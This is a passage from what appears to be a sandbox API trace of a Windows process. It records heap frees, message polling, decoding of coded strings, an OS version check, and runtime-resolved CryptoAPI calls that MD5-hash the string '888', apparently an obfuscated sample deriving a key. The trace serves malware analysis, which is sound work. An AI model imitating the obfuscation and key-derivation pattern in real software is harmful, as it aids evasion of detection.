hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0202.828] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.828] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.828] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0202.828] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0202.828] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0202.828] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0202.828] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0202.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0202.829] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0202.829] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0202.829] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.829] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.830] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0202.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0202.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0202.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0202.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0202.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0202.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0202.830] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.830] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.830] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0202.830] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.830] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0202.830] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0202.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0202.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0202.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0202.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0202.831] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c5d8) returned 1 [0202.831] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.831] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.831] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0202.832] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.832] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0202.832] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.832] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0202.832] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.832] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0202.832] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.832] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0202.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.832] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0202.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.833] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0202.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.833] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0202.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.833] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0202.833] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.833] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0202.833] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.833] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0202.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.833] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0202.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.834] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.834] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.834] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0202.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.834] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0202.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.834] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0202.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaade0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0202.834] CryptCreateHash (in: hProv=0xa7c5d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0202.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0202.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72738, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0202.835] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0202.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0202.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0202.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.835] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.835] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.835] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.835] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.835] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0202.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaab88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0202.835] CryptHashData (hHash=0x9e1eb8, pbData=0x2a726a8, dwDataLen=0x3, dwFlags=0x1) returned 1 